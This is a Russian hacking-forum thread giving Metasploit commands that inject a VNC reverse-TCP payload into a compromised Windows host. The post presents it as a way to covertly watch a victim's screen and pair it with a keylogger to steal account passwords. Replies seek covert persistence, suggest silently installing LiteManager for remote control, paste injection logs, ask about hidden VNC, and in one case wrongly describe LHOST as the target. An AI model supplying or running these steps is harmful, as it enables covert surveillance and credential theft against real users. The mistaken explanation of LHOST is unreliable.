1. Набираем команду codeby webinar. Набираем команду для организации и проведения вебинаров. Подробнее ...

    Скрыть объявление
  2. Требуются разработчики и тестеры для проекта codebyOS. Требования для участия в проекте: Знание принципов работы ОС на базе Linux; Знание Bash; Крайне желательное знание CPP, Python, Lua; Навыки системного администрирования. Подробнее ...

    Скрыть объявление
  3. Получи 30.000 рублей. Для получения денег необходимо принять участие в конкурсе авторов codeby. С условиями и призами можно ознакомиться на этой странице ...

    Внимание! Регистрация авторов на конкурс закрыта.

    Скрыть объявление

Захват VNC сессии на удаленном компьютере.

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 7 сен 2016.

  1. Vander

    Vander Well-Known Member
    Администратор

    Репутация:
    7
    Регистрация:
    16 янв 2016
    Сообщения:
    902
    Симпатии:
    1.966
    Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:

    Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.

    Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.

    Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.

    Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,

    Захват VNC сессии на удаленном компьютере.

    (с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

    > use windows/manage/payload_inject

    > set payload windows/vncinject/reverse_tcp

    > set LHOST 192.168.0.18 (IP атакуещего)

    > set session 2 (Номер вашей сессии с привилегиями)

    > set handler true

    > exploit

    Захват VNC сессии на удаленном компьютере.

    Убеждаемся, что все идет успешно:

    Захват VNC сессии на удаленном компьютере.

    В результате этих действий будет открыто окно VNC – сервера:

    Захват VNC сессии на удаленном компьютере.

    На этом все, вопросы и пожелания жду в комментариях.
     
    #1 Vander, 7 сен 2016
    Последнее редактирование: 7 сен 2016
    AL04E, u7u, id2746 и 4 другим нравится это.
  2. z3RoTooL

    z3RoTooL Well-Known Member
    Red Team

    Репутация:
    2
    Регистрация:
    28 фев 2016
    Сообщения:
    597
    Симпатии:
    403
    збс, лес как у меня на обоях :)
     
  3. IronBird

    IronBird Member

    Репутация:
    0
    Регистрация:
    14 авг 2016
    Сообщения:
    14
    Симпатии:
    7
    Так может это и твой стол?)
     
    Vander нравится это.
  4. z3RoTooL

    z3RoTooL Well-Known Member
    Red Team

    Репутация:
    2
    Регистрация:
    28 фев 2016
    Сообщения:
    597
    Симпатии:
    403
    точно :) спалился
     
  5. Алёша

    Алёша New Member

    Репутация:
    0
    Регистрация:
    15 сен 2016
    Сообщения:
    1
    Симпатии:
    0
    кто нибудь знает как беспалевно вживить payload на постоянно?
     
  6. WebWare Team

    WebWare Team Well-Known Member
    Администратор

    Репутация:
    3
    Регистрация:
    30 дек 2015
    Сообщения:
    917
    Симпатии:
    896
    Алексей, здравствуйте. Тема форума Этичный хакинг и тестирование на проникновение.
     
    Vander нравится это.
  7. Triton

    Triton Well-Known Member

    Репутация:
    0
    Регистрация:
    1 окт 2016
    Сообщения:
    55
    Симпатии:
    44
    В отрытой сессии пейлоада:
    Пропишет нагрузку как сервис.
    Справка:
     
    m0tion нравится это.
  8. Ishikawa

    Ishikawa マエストロ
    Grey Team

    Репутация:
    1
    Регистрация:
    15 ноя 2016
    Сообщения:
    124
    Симпатии:
    165
    Под винду можно LiteManager Server ставить с ключем /silent
    Устанавливается тихо, отрывает TCP 5650, сам ставится в accept firewall
    И можно не только смотреть, но и управлять, режимов масса.
     
    kot-gor, BaJIepraH и Vander нравится это.
  9. OmeN

    OmeN New Member

    Репутация:
    0
    Регистрация:
    21 мар 2017
    Сообщения:
    1
    Симпатии:
    0
    я не понял .. куда вводить эти команды ? в терменал Кали ? ввожу use windows/manage/payload_inject - пишет bash: use: command not found . И как открыть сессию meterpreter с повышенными привилегиями ?
     
  10. ghostphisher

    ghostphisher гарант codeby
    ELEET

    Репутация:
    5
    Регистрация:
    7 дек 2016
    Сообщения:
    1.778
    Симпатии:
    1.710
    Это надо вводить в msf консоль
    сначало msfconsole запускаем.
     
  11. asshole

    asshole Member

    Репутация:
    0
    Регистрация:
    25 мар 2017
    Сообщения:
    8
    Симпатии:
    2
    Вопрос нуба: ip атакующего это ip жертвы?(вряд ли) если нет, то какие данные жертвы? просто не понял, какая из команд отвечает за ввод данных жертвы?
     
  12. DSW

    DSW Well-Known Member

    Репутация:
    0
    Регистрация:
    20 мар 2017
    Сообщения:
    71
    Симпатии:
    21
    set LHOST ip атакующего это твой ip например 192.168.1.100
    ip жертвы это тот кого собираешься атаковать например 1.1.1.1
     
  13. asshole

    asshole Member

    Репутация:
    0
    Регистрация:
    25 мар 2017
    Сообщения:
    8
    Симпатии:
    2
    use windows/manage/payload_inject

    > set payload windows/vncinject/reverse_tcp

    > set LHOST 192.168.0.18 (IP атакуещего)

    > set session 2 (Номер вашей сессии с привилегиями)

    > set handler true

    > exploit

    Какая команда указывает жертву?
     
  14. DSW

    DSW Well-Known Member

    Репутация:
    0
    Регистрация:
    20 мар 2017
    Сообщения:
    71
    Симпатии:
    21
    Я тут молец ступил,полуается что set LHOST 192.168.0.18 это тот кого атакуем
     
  15. asshole

    asshole Member

    Репутация:
    0
    Регистрация:
    25 мар 2017
    Сообщения:
    8
    Симпатии:
    2
    Спс. Ip серый или белый?
     
  16. Chena

    Chena Member

    Репутация:
    0
    Регистрация:
    10 фев 2017
    Сообщения:
    12
    Симпатии:
    4
    Ну что я могу сказать . Статья стоит своего Хозяина , а хозяин статьи молодец )
     
  17. Dmitry88

    Dmitry88 Well-Known Member

    Репутация:
    0
    Регистрация:
    29 дек 2016
    Сообщения:
    107
    Симпатии:
    104
    Подниму старую тему. Не могу побороть вин7 х64. "VNC closed connection" , пейлоад отрабатвывает нормально, а вот подключиться не могу. Утром тестил на х32 все отлично было. Потом пару раз запускал на х64.

    Код:
    Executing the VNC agent with endpoint 10.10.ххх.ххх:4545...
    
    TigerVNC Viewer 64-bit v1.7.0
    Built on: 2017-04-09 14:55
    Copyright (C) 1999-2016 TigerVNC Team and many others (see README.txt)
    See http://www.tigervnc.org for information on TigerVNC.
    meterpreter >
    Fri Jun 23 16:46:45 2017
    DecodeManager: Detected 2 CPU core(s)
    DecodeManager: Creating 2 decoder thread(s)
    CConn:       connected to host 127.0.0.1 port 5900
    CConn:       End of stream
    И все. подключиться не могу.
     
  18. OneDollar

    OneDollar Well-Known Member
    Премиум

    Репутация:
    8
    Регистрация:
    7 сен 2017
    Сообщения:
    126
    Симпатии:
    67
    [*] Starting exploit/multi/handler
    [*] Performing Architecture Check
    [-] Handler failed to bind to 192.168.0.102:4433:- -
    [*] Started reverse TCP handler on 0.0.0.0:4433
    [*] Process found checking Architecture
    [+] Process is the same architecture as the payload
    [*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 3880
    [*] Opening process 3880
    [*] Generating payload
    [*] Allocating memory in procees 3880
    [*] Allocated memory at address 0x007a0000, for 281 byte stager
    [*] Writing the stager into memory...
    [+] Successfully injected payload in to process: 3880
    [*] Post module execution completed


    Но ничего не открывается....
     
  19. 78tyn8!gert

    78tyn8!gert Member

    Репутация:
    0
    Регистрация:
    2 ноя 2017
    Сообщения:
    13
    Симпатии:
    12
    А если нужны Hide VNC, посоветуете в какую сторону смотреть? Кусочек который отвалился от Зевса не предлагать.
     
Загрузка...

Поделиться этой страницей